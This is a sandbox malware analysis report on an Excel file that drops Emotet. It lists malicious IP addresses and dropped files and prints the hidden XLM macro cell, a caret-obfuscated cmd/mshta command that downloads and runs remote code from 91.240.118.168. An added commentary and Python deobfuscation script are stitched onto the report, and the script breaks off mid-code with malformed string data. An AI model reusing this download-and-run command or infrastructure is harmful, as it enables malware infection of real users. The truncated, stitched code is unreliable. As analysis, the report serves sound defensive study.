                                                                          unknownAustralia
                                                                          56038RACKCORP-APRackCorpAUtrue
IP | Domain | Country | ASN | Malicious
173.214.173.220 | unknown | United States | 19318 IS-AS-1US | true
212.24.98.99 | unknown | Lithuania | 62282 RACKRAYUABRakrejusLT | true
138.185.72.26 | unknown | Brazil | 264343 EmpasoftLtdaMeBR | true
178.63.25.185 | unknown | Germany | 24940 HETZNER-ASDE | true
160.16.102.168 | unknown | Japan | 9370 SAKURA-BSAKURAInternetIncJP | true
81.0.236.90 | unknown | Czech Republic | 15685 CASABLANCA-ASInternetCollocationProviderCZ | true
103.75.201.2 | unknown | Thailand | 133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH | true
216.158.226.206 | unknown | United States | 19318 IS-AS-1US | true
45.118.115.99 | unknown | Indonesia | 131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID | true
51.15.4.22 | unknown | France | 12876 OnlineSASFR | true
159.89.230.105 | unknown | United States | 14061 DIGITALOCEAN-ASNUS | true
162.214.50.39 | unknown | United States | 46606 UNIFIEDLAYER-AS-1US | true
91.240.118.168 | unknown | unknown | 49453 GLOBALLAYERNL | true
200.17.134.35 | unknown | Brazil | 1916 AssociacaoRedeNacionaldeEnsinoePesquisaBR | true
217.182.143.207 | unknown | France | 16276 OVHFR | true
107.182.225.142 | unknown | United States | 32780 HOSTINGSERVICES-INCUS | true
51.38.71.0 | unknown | France | 16276 OVHFR | true
45.118.135.203 | unknown | Japan | 63949 LINODE-APLinodeLLCUS | true
50.116.54.215 | unknown | United States | 63949 LINODE-APLinodeLLCUS | true
139.59.58.214 | ayoobeducationaltrust.in | Singapore | 14061 DIGITALOCEAN-ASNUS | true
131.100.24.231 | unknown | Brazil | 61635 GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR | true
46.55.222.11 | unknown | Bulgaria | 34841 BALCHIKNETBG | true
41.76.108.46 | unknown | South Africa | 327979 DIAMATRIXZA | true
173.212.193.249 | unknown | Germany | 51167 CONTABODE | true
45.176.232.124 | unknown | Colombia | 267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC | true
178.79.147.66 | unknown | United Kingdom | 63949 LINODE-APLinodeLLCUS | true
212.237.5.209 | unknown | Italy | 31034 ARUBA-ASNIT | true
162.243.175.63 | unknown | United States | 14061 DIGITALOCEAN-ASNUS | true
176.104.106.96 | unknown | Serbia | 198371 NINETRS | true
207.38.84.195 | unknown | United States | 30083 AS-30083-GO-DADDY-COM-LLCUS | true
164.68.99.3 | unknown | Germany | 51167 CONTABODE | true
192.254.71.210 | unknown | United States | 64235 BIGBRAINUS | true
212.237.56.116 | unknown | Italy | 31034 ARUBA-ASNIT | true
104.168.155.129 | unknown | United States | 54290 HOSTWINDSUS | true
45.142.114.231 | unknown | Germany | 44066 DE-FIRSTCOLOwwwfirst-colonetDE | true
203.114.109.124 | unknown | Thailand | 131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH | true
209.59.138.75 | unknown | United States | 32244 LIQUIDWEBUS | true
159.8.59.82 | unknown | United States | 36351 SOFTLAYERUS | true
129.232.188.93 | unknown | South Africa | 37153 xneeloZA | true
58.227.42.236 | unknown | Korea Republic of | 9318 SKB-ASSKBroadbandCoLtdKR | true
158.69.222.101 | unknown | Canada | 16276 OVHFR | true
104.251.214.46 | unknown | United States | 54540 INCERO-HVVCUS | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562430
Start date: 28.01.2022
Start time: 21:29:03
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 364453688149503140239183.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@25/9@1/47
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 21.1% (good quality ratio 18.4%)
• Quality average: 67.6%
• Quality standard deviation: 31.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 92.123.101.235, 84.53.177.19
• Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target mshta.exe, PID 2840 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 3004 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:29:23 | API Interceptor | 54x Sleep call for process: mshta.exe modified
21:29:28 | API Interceptor | 438x Sleep call for process: powershell.exe modified
21:29:47 | API Interceptor | 147x Sleep call for process: rundll32.exe modified
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 548864
Entropy (8bit): 6.9805281108446335
Encrypted: false
SSDEEP: 12288:B2AavzUBPSczbeeTLjvGyMwWd3DYr6i64/:OUBPSczbeeTnv6ZDWA
MD5: 29389EBE59F75F143BC38D8932E06808
SHA1: D5370F203FD1A34F4B4A5AAE58C2EEE0B39F864B
SHA-256: AB46128507884F34AA46ADEDB1266B5D3DCD09EB39D657E3FAE7A97B870B8350
SHA-512: CC9645B935093040758099B9B8E0C201B35D4CA2638E3BC0B71E03412F16259583E32E1559E123B64D9FB72C1A795CDE26022927756BCC4943718CC336316408
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\mshta.exe
File Type: data
Category: downloaded
Size (bytes): 10938
Entropy (8bit): 6.175530209677761
Encrypted: false
SSDEEP: 192:aYheCkQRsqy+PVnH7GZ6oK3i8jcTWaIpWOOKesH5n8rM5eZoE2dwIUuaQkPNKtXi:aYdkexPZy9K3i0cTOdDewnTE2+Io1liS
MD5: B44D97C843AE9C7EE5C2DFAEC0E71745
SHA1: FE1DBDC7AE560D8062D4537E078D466D405EA5C5
SHA-256: 45F1EB0D5B17B378AC2F50D05E1B29D4D8070791690E63C23C8AC720D4FD4C36
SHA-512: 91CF71B8C949A3580D49BBC9FD776853ACB561710B30F6D26D01F53031BECF7AFEC924736DD8DC810D10F90F97E6D0FB1985EE0ABA5D28BE4B194D2128ACFEDC
Malicious: false
Reputation: unknown
IE Cache URL: http://91.240.118.168/vvv/ppp/fe.html
                                                                          Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';r1L4h2W4JYYeJ=new Array();bWx6JIowwnOsh=new Array();bWx6JIowwnOsh[0]='e\106\113F%34%36C%31' ;r1L4h2W4JYYeJ[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.%.7.6.%.6.1}..2.%.2.0}

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.1464700112623651
Encrypted: false
SSDEEP: 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5: 72F5C05B7EA8DD6059BF59F50B22DF33
SHA1: D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256: 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512: 6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious: false
Reputation: unknown
                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Reputation: unknown
                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 28672
Entropy (8bit): 3.517419133438836
Encrypted: false
SSDEEP: 768:dJlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtmi:drk3hbdlylKsgqopeJBWhZFGkE+cMLxl
MD5: 90BBAB05A4FF4BB17E4A70F529FBF5F9
SHA1: 8A302D36A0851F604B81016EC67E4EA0556263E2
SHA-256: B32CF0C2FD94AFE1AE7E0CA2C211F2363270784E2AB97E6BB0899749BE517DB5
SHA-512: 6C881DFF935679C17F13DC7A1D00047D6F4825F022E9EE4B9E850219376856E60028D00D2403F28454B6B56E8C1826FE928FD432FECEAE32830E296B0CA8A122
Malicious: false
Reputation: unknown
                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.58389176043684
Encrypted: false
SSDEEP: 96:chQCcMqlqvsqvJCwolz8hQCcMqlqvsEHyqvJCwor/zIyYuHyUVhAlUVrA2:ciUolz8iAHnor/zI9UVhnA2
MD5: 7058F03336E9B68499C25299B9225929
SHA1: A76E437B7FE66D4CFBE22ADB8D87AC37A388296E
SHA-256: E1AF258DD3672DF2FD3205711BA938DA9463B45F7A7DEC6E518F20731EA1F152
SHA-512: 619504984C735486B2A1EC437D484B956E0AB5670C1C7AF9FE8AE9FFE821929D05AB7C873051EEFD029FE5BAEFDF62D93295A37F97E534C7A2912745059F9464
Malicious: false
Reputation: unknown
                                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 20:28:58 2022, Last Saved Time/Date: Thu Jan 27 20:32:51 2022, Security: 0
                                                                          Category:dropped
                                                                          Size (bytes):47616
                                                                          Entropy (8bit):6.003066970272085
                                                                          Encrypted:false
                                                                          SSDEEP:768:HJlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtm/piJaiyH5YnJe+eO+8WoFYpLy:Hrk3hbdlylKsgqopeJBWhZFGkE+cMLxl
                                                                          MD5:5BEF9644759EAA393FB6961698E69BE6
                                                                          SHA1:73C9BBD08D2CCCE85008673AC820D9E883908A08
                                                                          SHA-256:C195F5C47D4048BD8CB26596FE2DC884FF86E98E987CCF338D2A2035318A2231
                                                                          SHA-512:C83B14C2C14DB96551A4E377A1D3C00FB74F4B574C1F8109B78A37A8598F2510EA8BFAE4C469566A12935521FF367FFBBCB001E47AF531931D684FC14F5A4DD0
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\364453688149503140239183.xls, Author: John Lambert @JohnLaTwC
                                                                          • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\364453688149503140239183.xls, Author: Joe Security
                                                                          Reputation:unknown
                                                                          Preview:......................>.......................[...........................Z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1.
                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):548864
                                                                          Entropy (8bit):6.9805281108446335
                                                                          Encrypted:false
                                                                          SSDEEP:12288:B2AavzUBPSczbeeTLjvGyMwWd3DYr6i64/:OUBPSczbeeTnv6ZDWA
                                                                          MD5:29389EBE59F75F143BC38D8932E06808
                                                                          SHA1:D5370F203FD1A34F4B4A5AAE58C2EEE0B39F864B
                                                                          SHA-256:AB46128507884F34AA46ADEDB1266B5D3DCD09EB39D657E3FAE7A97B870B8350
                                                                          SHA-512:CC9645B935093040758099B9B8E0C201B35D4CA2638E3BC0B71E03412F16259583E32E1559E123B64D9FB72C1A795CDE26022927756BCC4943718CC336316408
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 20:28:58 2022, Last Saved Time/Date: Thu Jan 27 20:32:51 2022, Security: 0
                                                                          Entropy (8bit):5.979842615964849
                                                                          TrID:
                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                          File name:364453688149503140239183.xls
                                                                          File size:47865
                                                                          MD5:4097bbda61bfb39067eab29fb342e34e
                                                                          SHA1:ca13a07a1eb59e7b30f217239a0db63235354c49
                                                                          SHA256:4d876f4afaf9df30d8b9ecaeddd86defa6dedd94dcaa933d67fe578b9cabdc18
                                                                          SHA512:c644a5280a8c0176b786c74333421b04df43ec3ff6c4a56e84ff194bf8f26a8a6ccb5256743ece86665119a7267232dd3086cc971d02b7ae760cdc842c416680
                                                                          SSDEEP:768:0Jlk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZEtm/piJaiyH5YnJe+eO+8WoFYpLd:0rk3hbdlylKsgqopeJBWhZFGkE+cMLx6
                                                                          File Content Preview:........................>.......................[...........................Z..................................................................................................................................................................................
                                                                          Icon Hash:e4eea286a4b4bcb4
                                                                          Document Type:OLE
                                                                          Number of OLE Files:1
                                                                          Has Summary Info:True
                                                                          Application Name:Microsoft Excel
                                                                          Encrypted Document:False
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:
                                                                          Flash Objects Count:
                                                                          Contains VBA Macros:True
                                                                          Code Page:1251
                                                                          Author:xXx
                                                                          Last Saved By:xXx
                                                                          Create Time:2022-01-27 20:28:58
                                                                          Last Saved Time:2022-01-27 20:32:51
                                                                          Creating Application:Microsoft Excel
                                                                          Security:0
                                                                          Document Code Page:1251
                                                                          Thumbnail Scaling Desired:False
                                                                          Company:
                                                                          Contains Dirty Links:False
                                                                          Shared Document:False
                                                                          Changed Hyperlinks:False
                                                                          Application Version:1048576
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          File Type:data
                                                                          Stream Size:4096
                                                                          Entropy:0.322065673806
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . G O D V I N . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 aa 00 00 00
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          File Type:data
                                                                          Stream Size:4096
                                                                          Entropy:0.262591150018
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                          General
                                                                          Stream Path:Workbook
File Type:Applesoft BASIC program data, first line number 16 (false match by the file-type signature; the stream actually opens with a BIFF8 BOF record, visible as bytes 09 08 10 00 00 06 05 00 at the start of the raw dump below: record type 0x0809, length 16, version 0x0600, substream type 0x0005 = workbook globals)
                                                                          Stream Size:37694
                                                                          Entropy:6.96044271744
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c1 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Name:GODVIN
                                                                          Type:3
                                                                          Final:False
                                                                          Visible:False
                                                                          Protected:False
                                                                                            GODVIN
                                                                                            3
                                                                                            False
                                                                                            0
                                                                                            False
post (cell dump, one cell per line as row,col,content; a leading ' marks a text cell, = a formula):
3,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.
5,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
7,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
13,9,=EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l")
14,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.
16,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
18,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
20,9,=HALT()
21,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.
23,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
25,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.

                                                                          Name:GODVIN
                                                                          Type:3
                                                                          Final:False
                                                                          Visible:False
                                                                          Protected:False
                                                                                            GODVIN
                                                                                            3
                                                                                            False
                                                                                            0
                                                                                            False
pre (cell dump, one cell per line as row,col,content; a leading ' marks a text cell, = a formula):
3,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.
5,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
7,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
13,9,=EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l")
14,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.
16,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
18,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
20,9,=HALT()
21,9,' By in no ecstatic wondered disposal my speaking. Direct wholly valley or uneasy it at really. Sir wish like said dull and need make. Sportsman one bed departure rapturous situation disposing his. Off say yet ample ten ought hence. Depending in newspaper an september do existence strangers. Total great saw water had mirth happy new. Projecting pianoforte no of partiality is on. Nay besides joy society him totally six.
23,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
25,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.

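The EXEC cell in the GODVIN sheet above is readable only after the carets are stripped, because Excel passes the string to CMD.EXE untouched and it is cmd.exe's own escape handling that turns `ms^hta` into `mshta` and `91.2^40.118.1^68` into the real host before mshta ever sees it. The following is an added example, not code from the Joe Sandbox report: it parses the flattened "row,col,content" cell dump shown above (a constructed, shortened subset of it is embedded), locates EXEC() formulas, applies cmd.exe's caret rules (including the quoted-segment exception, which goes beyond the single cell on this page) and pulls out the URL and LOLBin names a responder would want as indicators. The names `CELL_DUMP`, `parse_cells`, `cmd_unescape` and `find_exec_commands` are this example's own.

```python
"""Recover the command hidden in an Excel 4.0 (XLM) macro cell.

Added example; not part of the Joe Sandbox report. It parses the flattened
"row,col,content" dump shown above and applies the escaping rules cmd.exe
uses, which is what the caret (^) obfuscation in the EXEC cell relies on.
"""
import re
from typing import Dict, List, Tuple

# Constructed subset of the GODVIN sheet dump above, with the filler text
# shortened: two text cells (leading '), the EXEC cell and the HALT cell.
CELL_DUMP = (
    "3,9,' By in no ecstatic wondered disposal my speaking. Nay besides joy society him totally six."
    '13,9,=EXEC("CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l")'
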